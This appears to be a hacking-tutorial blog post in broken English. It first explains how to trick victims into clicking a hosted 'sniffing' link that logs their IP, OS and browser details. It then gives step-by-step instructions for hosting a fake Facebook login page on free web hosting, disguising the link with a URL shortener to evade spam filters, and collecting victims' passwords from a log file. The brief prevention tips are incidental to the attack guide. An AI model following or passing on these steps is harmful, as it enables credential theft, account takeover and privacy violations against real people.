           This is one of mine favorite technique to sniff and harvest Personal Data of any Computer users, well let’s start it, in previous post of Sniffing I’d thought you only IP Sniffing Techniques but today I’ll teach you more sniffing techniques to steal personal data of Computer user such as Computer name, Host, IP, Server Agent, OS name and Version, etc.. this all info can harvest more information about any normal PC users Cyber Crime uses this techniques to Investigate and harvest information about Criminals. So let’s start.



# Requirements :

Okay, as I told you this Sniffer will sniff victim Computer name, Host, IP, Server Agent, OS name and Version, etc.. It’s cool Script. Follow the below steps.

# How to Sniff ?





  • Create free Web Hosting A/c on 000webhost.com

  • Download Sniffing Script

  • Upload all script in your File manager

  • Mak your Victim fool or Compromise your victim to click on your Sniffing Website link.

  • After all once your Victim will click on your Link, he will be redirected to your Sniffing Link and the Sniffer will Sniff all info of Victims computer.

  • And now just go back to your file manager Directory of your web host and you’ll see a new file with the name of “iplog” Just open it and you’ll get Sniffed Data like this:







How to Hack any facebook account using Phishing Attack



# What is Phishing 





Phishing is a fake login page designed by an attacker to steal personal info of victim’s. Phishing page looks same as Original page of any website or social networking website.

# How Phishing works ?   




As, I told you Phishing is a fake login page that is well designed same as original page to steal personal info of victim’s for eg. (ID, Password, E-mail, Contacts, Credit Card Stealing, etc).


An attacker will create a fake login page and host it on any free web hosting sites then attacker will send link of fake page to victim to steal his personal info or data and when victim will provide his personal info such as E-mail ID or Password then victim’s E-mail and Password will be hacked !!.

How to Prevent and be saved us from Phishing attack ?


1. Use best Antivirus and update it daily


      2. Check URL before logging to any website.

      4. Beware of E-mail Spoofer.

How to Create Phishing page and Hack any A/c ?

So, Friends here is our main topic, how to create Phishing page and hack any E-mail, Password :D


Here, I had just gave all step to create a Phishing page and hack any a/c

1)    Here, I take Facebook as my Fake Page to hack Facebook ID’s

2)    Download Facebook Phishing page from here

3)    Create free a/c on 000webhost.com and get free domain

4)    Here, I had already created one a/c for tutoial




5)    After creating free a/c and domain go to your Control panel > and Click on File Manager


6)    If it will ask for password, then provide your Password

7)    And then go in public_html folder and delete default.php file

8)    After deleting default file, click on upload and you will be redirected to this page


9)    I suggest you to use ZIP archives to upload it’s fast and easy :D , so click on choose file

and select ZIP file you downloaded it step 2.


10)  After uploading your Phishing page you will see this page



11)  So, After Creating your server go to your website for eg. mine is luzw0rmtut.site11.com

if you will visit your website then you will see this type of options.




12)  Click on Login.html and you will be redirected to your Phishing page that looks same as

       Facebook original page. CLICK ON IMAGE TO ENLARGE IT



13)  And now copy the Address of this page and Go to Google URL Shortener and

Shortern your URL to make your victim’s Fool and not to detect as SPAM



14)  Let’s check whether our Phishing page is working or not ? Go on your Phishing page

       and Enter any fake ID and Password in E-mail and Password BOX



15)  After providing your fake info click on login and you will be redirected to you tube

and your E-mail ID and Password will be hacked !!


16)  How to know the Password ? Again Go to your 000webhost dashboard and

        over there you will see another file manager 

 



17) Go in Another file manager > public_html > After Entering in public_html folder

you will see this 4 files




18)  Double click on log.txt file and download it after all open it .



19)  Now you can see how Phishing attack works and steal FB password